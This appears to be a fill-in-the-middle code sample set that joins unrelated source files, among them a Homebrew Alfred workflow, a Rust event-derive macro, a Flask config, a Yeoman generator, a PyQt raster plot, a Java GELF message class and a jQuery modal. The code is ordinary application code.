formula.rsplit()[0] wf.add_item(formula, 'Open formula on GitHub.', arg='brew info --github %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('pin'): for formula in filter_installed_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Pin formula.', arg='brew pin %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) # delete cached file wf.cache_data('brew_pinned_formulae', None) elif query and query.startswith('unpin'): for formula in filter_pinned_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Unpin formula.', arg='brew unpin %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) # delete cached file wf.cache_data('brew_pinned_formulae', None) elif query and query.startswith('cat'): for formula in filter_all_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Display the source to this formula.', arg='brew cat %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('outdated'): for formula in filter_outdated_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Upgrade formula.', arg='brew upgrade %s' % name, valid=True, 
icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('info'): wf.add_item(get_info(), autocomplete='', icon=helpers.get_icon(wf, 'info')) elif query and query.startswith('commands'): for command in get_commands(wf, query): wf.add_item(command, 'Run this command.', arg='brew %s' % command, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) elif query and query.startswith('config'): helpers.edit_settings(wf) wf.add_item('`settings.json` has been opened.', autocomplete='', icon=helpers.get_icon(wf, 'info')) else: actions = brew_actions.ACTIONS if len(wf.cached_data('brew_pinned_formulae', get_pinned_formulae, max_age=3600)) > 0: actions.append({ 'name': 'Unpin', 'description': 'Unpin formula.', 'autocomplete': 'unpin ', 'arg': '', 'valid': False, }) # filter actions by query if query:<|fim▁hole|> actions = wf.filter(query, actions, key=helpers.search_key_for_action, match_on=MATCH_SUBSTRING) if len(actions) > 0: for action in actions: wf.add_item(action['name'], action['description'], uid=action['name'], autocomplete=action['autocomplete'], arg=action['arg'], valid=action['valid'], icon=helpers.get_icon(wf, 'chevron-right')) else: wf.add_item('No action found for "%s"' % query, autocomplete='', icon=helpers.get_icon(wf, 'info')) if len(wf._items) == 0: query_name = query[query.find(' ') + 1:] wf.add_item('No formula found for "%s"' % query_name, autocomplete='%s ' % query[:query.find(' ')], icon=helpers.get_icon(wf, 'info')) wf.send_feedback() # refresh cache cmd = ['/usr/bin/python', wf.workflowfile('brew_refresh.py')] run_in_background('brew_refresh', cmd) if __name__ == '__main__': wf = Workflow(update_settings={'github_slug': GITHUB_SLUG}) sys.exit(wf.run(main))<|fim▁end|>
<|file_name|>media_tag.py<|end_file_name|><|fim▁begin|>import enum from typing import Dict, Optional, Set @enum.unique class MediaTag(enum.IntEnum): # ndb keys are based on these! Don't change! CHAIRMANS_VIDEO = 0 CHAIRMANS_PRESENTATION = 1 CHAIRMANS_ESSAY = 2 MEDIA_TAGS: Set[MediaTag] = {t for t in MediaTag} TAG_NAMES: Dict[MediaTag, str] = { MediaTag.CHAIRMANS_VIDEO: "Chairman's Video", MediaTag.CHAIRMANS_PRESENTATION: "Chairman's Presentation", MediaTag.CHAIRMANS_ESSAY: "Chairman's Essay", } TAG_URL_NAMES: Dict[MediaTag, str] = { MediaTag.CHAIRMANS_VIDEO: "chairmans_video", MediaTag.CHAIRMANS_PRESENTATION: "chairmans_presentation", MediaTag.CHAIRMANS_ESSAY: "chairmans_essay", } CHAIRMANS_TAGS: Set[MediaTag] = { MediaTag.CHAIRMANS_VIDEO, MediaTag.CHAIRMANS_PRESENTATION, MediaTag.CHAIRMANS_ESSAY, } <|fim▁hole|> return inversed[url_name] else: return None<|fim▁end|>
def get_enum_from_url(url_name: str) -> Optional[MediaTag]: inversed = {v: k for k, v in TAG_URL_NAMES.items()} if url_name in inversed:
<|file_name|>event.rs<|end_file_name|><|fim▁begin|>//! Implementation of the top level `*Event` derive macro. use proc_macro2::{Span, TokenStream}; use quote::{format_ident, quote}; use syn::{ parse_quote, Data, DataStruct, DeriveInput, Field, Fields, FieldsNamed, GenericParam, Meta, MetaList, NestedMeta, }; use super::{ event_parse::{to_kind_variation, EventKind, EventKindVariation}, util::is_non_stripped_room_event, }; use crate::{import_ruma_common, util::to_camel_case}; /// Derive `Event` macro code generation. pub fn expand_event(input: DeriveInput) -> syn::Result<TokenStream> { let ruma_common = import_ruma_common(); let ident = &input.ident; let (kind, var) = to_kind_variation(ident).ok_or_else(|| { syn::Error::new_spanned(ident, "not a valid ruma event struct identifier") })?; let fields: Vec<_> = if let Data::Struct(DataStruct { fields: Fields::Named(FieldsNamed { named, .. }),<|fim▁hole|> .. }) = &input.data { if !named.iter().any(|f| f.ident.as_ref().unwrap() == "content") { return Err(syn::Error::new( Span::call_site(), "struct must contain a `content` field", )); } named.iter().cloned().collect() } else { return Err(syn::Error::new_spanned( input.ident, "the `Event` derive only supports structs with named fields", )); }; let mut res = TokenStream::new(); res.extend(expand_serialize_event(&input, var, &fields, &ruma_common)); res.extend(expand_deserialize_event(&input, kind, var, &fields, &ruma_common)?); if var.is_sync() { res.extend(expand_sync_from_into_full(&input, kind, var, &fields, &ruma_common)); } if matches!(kind, EventKind::MessageLike | EventKind::State) && matches!(var, EventKindVariation::Full | EventKindVariation::Sync) { res.extend(expand_redact_event(&input, kind, var, &fields, &ruma_common)); } if is_non_stripped_room_event(kind, var) { res.extend(expand_eq_ord_event(&input)); } Ok(res) } fn expand_serialize_event( input: &DeriveInput, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> TokenStream { let serde = quote! { #ruma_common::exports::serde }; let ident = &input.ident; let (impl_gen, ty_gen, where_clause) = input.generics.split_for_impl(); let serialize_fields: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); if name == "content" && var.is_redacted() { quote! { if #ruma_common::events::RedactedEventContent::has_serialize_fields(&self.content) { state.serialize_field("content", &self.content)?; } } } else if name == "unsigned" { quote! { if !self.unsigned.is_empty() { state.serialize_field("unsigned", &self.unsigned)?; } } } else { let name_s = name.to_string(); match &field.ty { syn::Type::Path(syn::TypePath { path: syn::Path { segments, .. }, .. }) if segments.last().unwrap().ident == "Option" => { quote! { if let Some(content) = self.#name.as_ref() { state.serialize_field(#name_s, content)?; } } } _ => quote! { state.serialize_field(#name_s, &self.#name)?; }, } } }) .collect(); quote! 
{ #[automatically_derived] impl #impl_gen #serde::ser::Serialize for #ident #ty_gen #where_clause { fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error> where S: #serde::ser::Serializer, { use #serde::ser::{SerializeStruct as _, Error as _}; let event_type = #ruma_common::events::EventContent::event_type(&self.content); let mut state = serializer.serialize_struct(stringify!(#ident), 7)?; state.serialize_field("type", event_type)?; #( #serialize_fields )* state.end() } } } } fn expand_deserialize_event( input: &DeriveInput, _kind: EventKind, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> syn::Result<TokenStream> { let serde = quote! { #ruma_common::exports::serde }; let serde_json = quote! { #ruma_common::exports::serde_json }; let ident = &input.ident; // we know there is a content field already let content_type = &fields .iter() // we also know that the fields are named and have an ident .find(|f| f.ident.as_ref().unwrap() == "content") .unwrap() .ty; let (impl_generics, ty_gen, where_clause) = input.generics.split_for_impl(); let is_generic = !input.generics.params.is_empty(); let enum_variants: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); to_camel_case(name) }) .collect(); let deserialize_var_types: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); let ty = &field.ty; if name == "content" || name == "prev_content" { if is_generic { quote! { ::std::boxed::Box<#serde_json::value::RawValue> } } else { quote! { #content_type } } } else { #[allow(unused_mut)] let mut ty = quote! { #ty }; #[cfg(feature = "compat")] if matches!(_kind, EventKind::State) && name == "unsigned" { match var { EventKindVariation::Full | EventKindVariation::Sync => { ty = quote! { #ruma_common::events::UnsignedWithPrevContent }; } EventKindVariation::Redacted | EventKindVariation::RedactedSync => { ty = quote! { #ruma_common::events::RedactedUnsignedWithPrevContent }; } EventKindVariation::Stripped | EventKindVariation::Initial => { unreachable!() } } } ty } }) .collect(); let ok_or_else_fields: Vec<_> = fields .iter() .map(|field| { let name = field.ident.as_ref().unwrap(); Ok(if name == "content" { if is_generic && var.is_redacted() { quote! { let content = match C::has_deserialize_fields() { #ruma_common::events::HasDeserializeFields::False => { C::empty(&event_type).map_err(A::Error::custom)? }, #ruma_common::events::HasDeserializeFields::True => { let json = content.ok_or_else( || #serde::de::Error::missing_field("content"), )?; C::from_parts(&event_type, &json).map_err(A::Error::custom)? }, #ruma_common::events::HasDeserializeFields::Optional => { let json = content.unwrap_or( #serde_json::value::RawValue::from_string("{}".to_owned()) .unwrap() ); C::from_parts(&event_type, &json).map_err(A::Error::custom)? }, }; } } else if is_generic { quote! { let content = { let json = content .ok_or_else(|| #serde::de::Error::missing_field("content"))?; C::from_parts(&event_type, &json).map_err(A::Error::custom)? }; } } else { quote! { let content = content.ok_or_else( || #serde::de::Error::missing_field("content"), )?; } } } else if name == "prev_content" { if is_generic { #[allow(unused_mut)] let mut res = quote! { let prev_content = prev_content.map(|json| { C::from_parts(&event_type, &json).map_err(A::Error::custom) }).transpose()?; }; #[cfg(feature = "compat")] if let EventKind::State = _kind { res = quote! 
{ let prev_content = prev_content .or_else(|| unsigned.as_mut().and_then(|u| u.prev_content.take())); #res }; }; res } else { TokenStream::new() } } else if name == "unsigned" { #[allow(unused_mut)] let mut res = quote! { let unsigned = unsigned.unwrap_or_default(); }; #[cfg(feature = "compat")] if matches!(_kind, EventKind::State) { res = quote! { let unsigned = unsigned.map_or_else( ::std::default::Default::default, ::std::convert::From::from, ); }; } res } else { let attrs: Vec<_> = field .attrs .iter() .filter(|a| a.path.is_ident("ruma_event")) .map(|a| a.parse_meta()) .collect::<syn::Result<_>>()?; let has_default_attr = attrs.iter().any(|a| { matches!( a, Meta::List(MetaList { nested, .. }) if nested.iter().any(|n| { matches!(n, NestedMeta::Meta(Meta::Path(p)) if p.is_ident("default")) }) ) }); if has_default_attr { quote! { let #name = #name.unwrap_or_default(); } } else { quote! { let #name = #name.ok_or_else(|| { #serde::de::Error::missing_field(stringify!(#name)) })?; } } }) }) .collect::<syn::Result<_>>()?; let field_names: Vec<_> = fields.iter().flat_map(|f| &f.ident).collect(); let deserialize_impl_gen = if is_generic { let gen = &input.generics.params; quote! { <'de, #gen> } } else { quote! { <'de> } }; let deserialize_phantom_type = if is_generic { quote! { ::std::marker::PhantomData } } else { quote! {} }; Ok(quote! { #[automatically_derived] impl #deserialize_impl_gen #serde::de::Deserialize<'de> for #ident #ty_gen #where_clause { fn deserialize<D>(deserializer: D) -> Result<Self, D::Error> where D: #serde::de::Deserializer<'de>, { #[derive(#serde::Deserialize)] #[serde(field_identifier, rename_all = "snake_case")] enum Field { // since this is represented as an enum we have to add it so the JSON picks it // up Type, #( #enum_variants, )* #[serde(other)] Unknown, } /// Visits the fields of an event struct to handle deserialization of /// the `content` and `prev_content` fields. struct EventVisitor #impl_generics (#deserialize_phantom_type #ty_gen); #[automatically_derived] impl #deserialize_impl_gen #serde::de::Visitor<'de> for EventVisitor #ty_gen #where_clause { type Value = #ident #ty_gen; fn expecting( &self, formatter: &mut ::std::fmt::Formatter<'_>, ) -> ::std::fmt::Result { write!(formatter, "struct implementing {}", stringify!(#content_type)) } fn visit_map<A>(self, mut map: A) -> Result<Self::Value, A::Error> where A: #serde::de::MapAccess<'de>, { use #serde::de::Error as _; let mut event_type: Option<String> = None; #( let mut #field_names: Option<#deserialize_var_types> = None; )* while let Some(key) = map.next_key()? 
{ match key { Field::Unknown => { let _: #serde::de::IgnoredAny = map.next_value()?; }, Field::Type => { if event_type.is_some() { return Err(#serde::de::Error::duplicate_field("type")); } event_type = Some(map.next_value()?); } #( Field::#enum_variants => { if #field_names.is_some() { return Err(#serde::de::Error::duplicate_field( stringify!(#field_names), )); } #field_names = Some(map.next_value()?); } )* } } let event_type = event_type.ok_or_else(|| #serde::de::Error::missing_field("type"))?; #( #ok_or_else_fields )* Ok(#ident { #( #field_names ),* }) } } deserializer.deserialize_map(EventVisitor(#deserialize_phantom_type)) } } }) } fn expand_redact_event( input: &DeriveInput, kind: EventKind, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> TokenStream { let redacted_type = kind.to_event_ident(var.to_redacted()); let redacted_content_trait = format_ident!("{}Content", kind.to_event_ident(EventKindVariation::Redacted)); let ident = &input.ident; let mut generics = input.generics.clone(); if generics.params.is_empty() { return TokenStream::new(); } assert_eq!(generics.params.len(), 1, "expected one generic parameter"); let ty_param = match &generics.params[0] { GenericParam::Type(ty) => ty.ident.clone(), _ => panic!("expected a type parameter"), }; let where_clause = generics.make_where_clause(); where_clause.predicates.push(parse_quote! { #ty_param: #ruma_common::events::RedactContent }); where_clause.predicates.push(parse_quote! { <#ty_param as #ruma_common::events::RedactContent>::Redacted: #ruma_common::events::#redacted_content_trait }); let (impl_generics, ty_gen, where_clause) = generics.split_for_impl(); let fields = fields.iter().filter_map(|field| { let ident = field.ident.as_ref().unwrap(); if ident == "content" || ident == "prev_content" { None } else if ident == "unsigned" { Some(quote! { unsigned: #ruma_common::events::RedactedUnsigned::new_because( ::std::boxed::Box::new(redaction), ) }) } else { Some(quote! { #ident: self.#ident }) } }); quote! { #[automatically_derived] impl #impl_generics #ruma_common::events::Redact for #ident #ty_gen #where_clause { type Redacted = #ruma_common::events::#redacted_type< <#ty_param as #ruma_common::events::RedactContent>::Redacted, >; fn redact( self, redaction: #ruma_common::events::room::redaction::SyncRoomRedactionEvent, version: &#ruma_common::RoomVersionId, ) -> Self::Redacted { let content = #ruma_common::events::RedactContent::redact(self.content, version); #ruma_common::events::#redacted_type { content, #(#fields),* } } } } } fn expand_sync_from_into_full( input: &DeriveInput, kind: EventKind, var: EventKindVariation, fields: &[Field], ruma_common: &TokenStream, ) -> TokenStream { let ident = &input.ident; let full_struct = kind.to_event_ident(var.to_full()); let (impl_generics, ty_gen, where_clause) = input.generics.split_for_impl(); let fields: Vec<_> = fields.iter().flat_map(|f| &f.ident).collect(); quote! { #[automatically_derived] impl #impl_generics ::std::convert::From<#full_struct #ty_gen> for #ident #ty_gen #where_clause { fn from(event: #full_struct #ty_gen) -> Self { let #full_struct { #( #fields, )* .. } = event; Self { #( #fields, )* } } } #[automatically_derived] impl #impl_generics #ident #ty_gen #where_clause { /// Convert this sync event into a full event, one with a room_id field. 
pub fn into_full_event( self, room_id: ::std::boxed::Box<#ruma_common::RoomId>, ) -> #full_struct #ty_gen { let Self { #( #fields, )* } = self; #full_struct { #( #fields, )* room_id, } } } } } fn expand_eq_ord_event(input: &DeriveInput) -> TokenStream { let ident = &input.ident; let (impl_gen, ty_gen, where_clause) = input.generics.split_for_impl(); quote! { #[automatically_derived] impl #impl_gen ::std::cmp::PartialEq for #ident #ty_gen #where_clause { /// Checks if two `EventId`s are equal. fn eq(&self, other: &Self) -> ::std::primitive::bool { self.event_id == other.event_id } } #[automatically_derived] impl #impl_gen ::std::cmp::Eq for #ident #ty_gen #where_clause {} #[automatically_derived] impl #impl_gen ::std::cmp::PartialOrd for #ident #ty_gen #where_clause { /// Compares `EventId`s and orders them lexicographically. fn partial_cmp(&self, other: &Self) -> ::std::option::Option<::std::cmp::Ordering> { self.event_id.partial_cmp(&other.event_id) } } #[automatically_derived] impl #impl_gen ::std::cmp::Ord for #ident #ty_gen #where_clause { /// Compares `EventId`s and orders them lexicographically. fn cmp(&self, other: &Self) -> ::std::cmp::Ordering { self.event_id.cmp(&other.event_id) } } } }<|fim▁end|>
<|file_name|>config.py<|end_file_name|><|fim▁begin|>import os class Config(object): DEBUG = False<|fim▁hole|> class ProductionConfig(Config): DEBUG = False SECRET_KEY = os.environ['SECRET_KEY'] class DevelopmentConfig(Config): DEVELOPMENT = True DEBUG = True class TestingConfig(Config): TESTING = True<|fim▁end|>
TESTING = False CSRF_ENABLED = True SECRET_KEY = "super_secret_key" SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
<|file_name|>index.js<|end_file_name|><|fim▁begin|>'use strict'; var path = require('path'); var generators = require('yeoman-generator'); var yaml = require('js-yaml'); var _ = require('lodash'); var chalk = require('chalk'); var GitHub = require('github'); module.exports = generators.Base.extend({ _logHeading: function (msg) { this.log("\n"); this.log.writeln(chalk.bold(msg)); this.log.writeln(chalk.bold('-------------------------------')); }, _listPlugins: function () { var github = new GitHub({ version: '3.0.0' }); github.search.repos({ q: 'wok-plugin+in:name' }, function (err, response) { console.log(response.items.length); }); }, // The name `constructor` is important here constructor: function () { // Calling the super constructor is important so our generator is correctly set up generators.Base.apply(this, arguments); this.answers = {}; }, askForProject: function () { var done = this.async(); var _utils = this._; this._logHeading('Collecting new project infos...'); var prompts = [{ type: 'text', name: 'name', message: 'Project name', 'default': 'awesome-wok-project', filter: function (value) { return _utils.slugify(value) } }, { type: 'text', name: 'description', message: 'Project description', 'default': 'Awesome WOK Project' }, { type: 'text', name: 'author', message: 'Author', 'default': this.user.git.name() }, { type: 'text', name: 'license', message: 'License', 'default': 'MIT' }]; this.prompt(prompts, function (answers) { this.answers.projectData = answers; done();<|fim▁hole|> }.bind(this)); }, askForFolders: function () { var done = this.async(); var _utils = this._; this._logHeading('Filesystem setup...'); var prompts = [ { type: 'text', name: 'www', message: 'Public assets folder', 'default': 'www', filter: function (value) { return _utils.slugify(value) } }]; this.prompt(prompts, function (answers) { answers.rsync = answers.www; this.answers.folders = answers; done(); }.bind(this)); }, fetchRepo: function () { var done = this.async(); this.remote('fevrcoding', 'wok', 'master', function (err, remote, files) { if (err) { //TODO manage error this.log.error('Unable to download latest version of https://github.com/fevrcoding/wok'); return false; } this.wokRepo = remote; this.wokFiles = files; done(); }.bind(this)); //this._listPlugins(); }, copyFiles: function () { var remote = this.wokRepo; var files = this.wokFiles; //copy main application folder remote.directory('application', 'application'); //build folder remote.dest.mkdir('build'); //copy unchanged configuration files ['hosts.yml', 'properties.yml'].forEach(function (filename) { var fullpath = path.join('build', 'grunt-config', filename); remote.copy(fullpath, fullpath); }); //copy unchanged files ['build/Gruntfile.js', 'build/compass.rb', 'bower.json', 'Gemfile'].forEach(function (filepath) { remote.copy(filepath, filepath); }); //copy dot files files.filter(function (path) { return path.indexOf('.') === 0 && path !== '.bowerrc'; }).forEach(function (el) { remote.copy(el, el); }); }, package: function () { var pkg = this.wokRepo.src.readJSON('package.json'); pkg = _.extend(pkg || {}, { version: '0.0.1', contributors: [] }, this.answers.projectData); this.wokRepo.dest.write('package.json', JSON.stringify(pkg, null, 4)); return pkg; }, config: function (remote) { var remote = this.wokRepo; var pathCfg = yaml.safeLoad(remote.src.read('build/grunt-config/paths.yml')); var defaultPublic = pathCfg.www; pathCfg = _.extend(pathCfg, this.answers.folders); remote.dest.write('build/grunt-config/paths.yml', yaml.safeDump(pathCfg)); 
//public www data to destination public folder remote.directory(defaultPublic, pathCfg.www); //write .bowerrc remote.dest.write('.bowerrc', JSON.stringify({directory: pathCfg.www + '/vendor'}, null, 4)); return pathCfg; }, readme: function () { //generate an empty readme file this.wokRepo.dest.write('README.md', '#' + this.answers.projectDescription + "\n\n"); }, install: function () { if (!this.options['skip-install']) { this.spawnCommand('bundler', ['install']); this.installDependencies({ skipMessage: true }); } var template = _.template('\n\nI\'m all done. ' + '<%= skipInstall ? "Just run" : "Running" %> <%= commands %> ' + '<%= skipInstall ? "" : "for you " %>to install the required dependencies.' + '<% if (!skipInstall) { %> If this fails, try running the command yourself.<% } %>\n\n' ); this.log(template({ skipInstall: this.options['skip-install'], commands: chalk.yellow.bold(['bower install', 'npm install', 'bundler install'].join(' & ')) })); } });<|fim▁end|>
<|file_name|>main_raster.py<|end_file_name|><|fim▁begin|>import time from PyQt4 import QtGui, QtCore, QtOpenGL from PyQt4.QtOpenGL import QGLWidget import OpenGL.GL as gl import OpenGL.arrays.vbo as glvbo import numpy as np import raster import slider import draw_texture import qt_helpers raster_width = 1024 raster_height = 64 raster_n_neurons = 64 spikes_per_frame = 5 class GLPlotWidget(QGLWidget): # default window size width, height = 600, 600 t_last_msg = time.time() spike_count = 0 last_time = None def initializeGL(self): # program for drawing spikes self.raster = raster.RasterProgram(raster_width, raster_height, raster_n_neurons) self.raster.link() # program for fading sparkleplot self.slider = slider.SlideProgram(raster_width, raster_height) self.slider.link() # program for rendering a texture on the screen self.draw_texture = draw_texture.DrawTextureProgram() self.draw_texture.link() def paintGL(self): now = time.time()<|fim▁hole|> decay = 0.0 self.dt = None else: dt = now - self.last_time if self.dt is None: self.dt = dt else: #self.dt = dt self.dt = (0.9) * self.dt + (0.1) * dt self.last_time = now if self.dt is not None: self.slider.swap_frame_buffer(int(self.dt/0.001)) self.slider.paint_slid() #data = self.data data = np.random.randint(raster_n_neurons, size=spikes_per_frame).astype('int32') # generate spike data self.spike_count += len(data) # paint the spikes onto the sparkle plot self.slider.swap_frame_buffer(0, False) self.raster.paint_spikes(data) # switch to rendering on the screen gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0) gl.glViewport(0, 0, self.width, self.height) # draw the sparkle plot on the screen self.draw_texture.paint(self.slider.get_current_texture()) # print out spike rate now = time.time() if now > self.t_last_msg + 1: dt = now - self.t_last_msg rate = self.spike_count * 0.000001 / dt print 'Mspikes per second = %g' % rate self.spike_count = 0 self.t_last_msg = now # flag a redraw self.update() def resizeGL(self, width, height): """Called upon window resizing: reinitialize the viewport.""" # update the window size self.width, self.height = width, height # paint within the whole window gl.glViewport(0, 0, width, height) if __name__ == '__main__': # define a Qt window with an OpenGL widget inside it class TestWindow(QtGui.QMainWindow): def __init__(self): super(TestWindow, self).__init__() # initialize the GL widget self.widget = GLPlotWidget() # put the window at the screen position (100, 100) self.setGeometry(100, 100, self.widget.width, self.widget.height) self.setCentralWidget(self.widget) self.show() # show the window win = qt_helpers.create_window(TestWindow)<|fim▁end|>
if self.last_time is None:
<|file_name|>GelfMessage.java<|end_file_name|><|fim▁begin|>/*Copyright (c) 2011 Anton Yakimov. GELF created by Lennart Koopmann, Aleksey Palazhchenko. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package org.graylog2; import org.json.simple.JSONValue; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStream; import java.io.UnsupportedEncodingException; import java.math.BigDecimal; import java.nio.ByteBuffer; import java.util.*; import java.util.zip.GZIPOutputStream; public class GelfMessage { private static final String ID_NAME = "id"; private static final String GELF_VERSION = "1.0"; private static final byte[] GELF_CHUNKED_ID = new byte[]{0x1e, 0x0f}; private static final int MAXIMUM_CHUNK_SIZE = 1420; private static final BigDecimal TIME_DIVISOR = new BigDecimal(1000); private String version = GELF_VERSION; private String host; private byte[] hostBytes = lastFourAsciiBytes("none"); private String shortMessage; private String fullMessage; private long javaTimestamp; private String level; private String facility = "gelf-java"; private String line; private String file; private Map<String, Object> additonalFields = new HashMap<String, Object>(); public GelfMessage() { } // todo: merge these constructors. 
public GelfMessage(String shortMessage, String fullMessage, Date timestamp, String level) { this.shortMessage = shortMessage; this.fullMessage = fullMessage; this.javaTimestamp = timestamp.getTime(); this.level = level; } public GelfMessage(String shortMessage, String fullMessage, Long timestamp, String level, String line, String file) { this.shortMessage = shortMessage; this.fullMessage = fullMessage; this.javaTimestamp = timestamp; this.level = level; this.line = line; this.file = file; } public String toJson() { Map<String, Object> map = new HashMap<String, Object>(); map.put("version", getVersion()); map.put("host", getHost()); map.put("short_message", getShortMessage()); map.put("full_message", getFullMessage()); map.put("timestamp", getTimestamp()); map.put("level", getLevel()); map.put("facility", getFacility()); if( null != getFile() ) { map.put("file", getFile()); } if( null != getLine() ) { map.put("line", getLine()); } for (Map.Entry<String, Object> additionalField : additonalFields.entrySet()) { if (!ID_NAME.equals(additionalField.getKey())) { map.put("_" + additionalField.getKey(), additionalField.getValue()); } } return JSONValue.toJSONString(map); } public List<byte[]> toDatagrams() { byte[] messageBytes = gzipMessage(toJson()); List<byte[]> datagrams = new ArrayList<byte[]>(); if (messageBytes.length > MAXIMUM_CHUNK_SIZE) { sliceDatagrams(messageBytes, datagrams); } else { datagrams.add(messageBytes); } return datagrams; } private void sliceDatagrams(byte[] messageBytes, List<byte[]> datagrams) { int messageLength = messageBytes.length; byte[] messageId = ByteBuffer.allocate(8) .putInt((int) System.currentTimeMillis()) // 4 least-significant-bytes of the time in millis .put(hostBytes) // 4 least-significant-bytes of the host .array(); int num = ((Double) Math.ceil((double) messageLength / MAXIMUM_CHUNK_SIZE)).intValue(); for (int idx = 0; idx < num; idx++) { byte[] header = concatByteArray(GELF_CHUNKED_ID, concatByteArray(messageId, new byte[]{(byte) idx, (byte) num})); int from = idx * MAXIMUM_CHUNK_SIZE; int to = from + MAXIMUM_CHUNK_SIZE; if (to >= messageLength) { to = messageLength; } byte[] datagram = concatByteArray(header, Arrays.copyOfRange(messageBytes, from, to)); datagrams.add(datagram); } } private byte[] gzipMessage(String message) { ByteArrayOutputStream bos = new ByteArrayOutputStream(); try { GZIPOutputStream stream = new GZIPOutputStream(bos); stream.write(message.getBytes()); stream.finish(); stream.close(); byte[] zipped = bos.toByteArray(); bos.close(); return zipped; } catch (IOException e) { return null; } } private byte[] lastFourAsciiBytes(String host) { final String shortHost = host.length() >= 4 ? 
host.substring(host.length() - 4) : host; try { return shortHost.getBytes("ASCII"); } catch (UnsupportedEncodingException e) { throw new RuntimeException("JVM without ascii support?", e); } } public String getVersion() { return version; } public void setVersion(String version) { this.version = version; } public String getHost() { return host; } public void setHost(String host) { this.host = host; this.hostBytes = lastFourAsciiBytes(host); } public String getShortMessage() { return shortMessage; } public void setShortMessage(String shortMessage) { this.shortMessage = shortMessage; } public String getFullMessage() { return fullMessage; } public void setFullMessage(String fullMessage) { this.fullMessage = fullMessage; } public String getTimestamp() { return new BigDecimal(javaTimestamp).divide(TIME_DIVISOR).toPlainString(); } public Long getJavaTimestamp() { return javaTimestamp; } public void setJavaTimestamp(long javaTimestamp) { this.javaTimestamp = javaTimestamp; } public String getLevel() { return level; } public void setLevel(String level) { this.level = level; } public String getFacility() { return facility; } public void setFacility(String facility) { this.facility = facility; } public String getLine() { return line; } public void setLine(String line) { this.line = line; } public String getFile() { return file; } public void setFile(String file) { this.file = file; } public GelfMessage addField(String key, String value) { getAdditonalFields().put(key, value); return this; } public GelfMessage addField(String key, Object value) { getAdditonalFields().put(key, value); return this; } public Map<String, Object> getAdditonalFields() { return additonalFields; } public void setAdditonalFields(Map<String, Object> additonalFields) { this.additonalFields = additonalFields;<|fim▁hole|> return !isEmpty(version) && !isEmpty(host) && !isEmpty(shortMessage) && !isEmpty(facility); } public boolean isEmpty(String str) { return str == null || "".equals(str.trim()); } private byte[] concatByteArray(byte[] first, byte[] second) { byte[] result = Arrays.copyOf(first, first.length + second.length); System.arraycopy(second, 0, result, first.length, second.length); return result; } }<|fim▁end|>
} public boolean isValid() {
<|file_name|>modal.js<|end_file_name|><|fim▁begin|>!function(namespace) { 'use strict'; function Modal(elem, params) { this.$element = jQuery(elem); this.params = params || {}; this.cssReadyElement = this.params.cssReadyElement || 'JS-Modal-ready'; this.cssActiveElement = this.params.cssActiveElement || 'JS-Modal-active'; this.__construct(); } Modal.prototype.__construct = function __construct() { this.$box = this.$element.find('.JS-Modal-Box'); this.$close = this.$element.find('.JS-Modal-Close'); this.$title = this.$element.find('.JS-Modal-Title'); this.$container = this.$element.find('.JS-Modal-Container'); this._init(); }; Modal.prototype._init = function _init() { var _this = this; this.$close.on('click.JS-Modal', function() { _this._close.apply(_this, []); }); $('body').on("keyup", function(e) { if ((e.keyCode == 27)) { _this._close.apply(_this, []); } }); $('.JS-Gannt-Modal').click(function() { if (_this.$element.hasClass('JS-Modal-active')) _this._close.apply(_this, []); }); $('.JS-Modal-Box').click(function(event){ event.stopPropagation(); }); /* API. Events */ this.$element.on('modal:setContent', function(e, data) { _this.setContent.apply(_this, [data]); }); this.$element.on('modal:open', function() { _this.open.apply(_this, []); }); this.$element.on('modal:close', function() { _this.close.apply(_this, []); }); this.$element.on('modal:clear', function() { _this.clear.apply(_this, []); }); this._ready(); } ; Modal.prototype._ready = function _ready() { this.$element .addClass(this.cssReadyElement) .addClass('JS-Modal-ready'); }; Modal.prototype._setContent = function _setContent(content) { this.$container.html(content); }; Modal.prototype._open = function _open() { if (!this.$element.hasClass('JS-Modal-active')) { this.$element .addClass(this.cssActiveElement) .addClass('JS-Modal-active') } }; Modal.prototype._close = function _close() { if (this.$element.hasClass('JS-Modal-active')) { this.$element .removeClass(this.cssActiveElement) .removeClass('JS-Modal-active'); } }; Modal.prototype._clear = function _clear() { }; /* API. Methods */ Modal.prototype.setContent = function setContent(content) { if (!arguments.length) { return false; } this._setContent(content); }; Modal.prototype.open = function open() { this._open(); }; <|fim▁hole|> Modal.prototype.clear = function clear() { this._clear(); }; 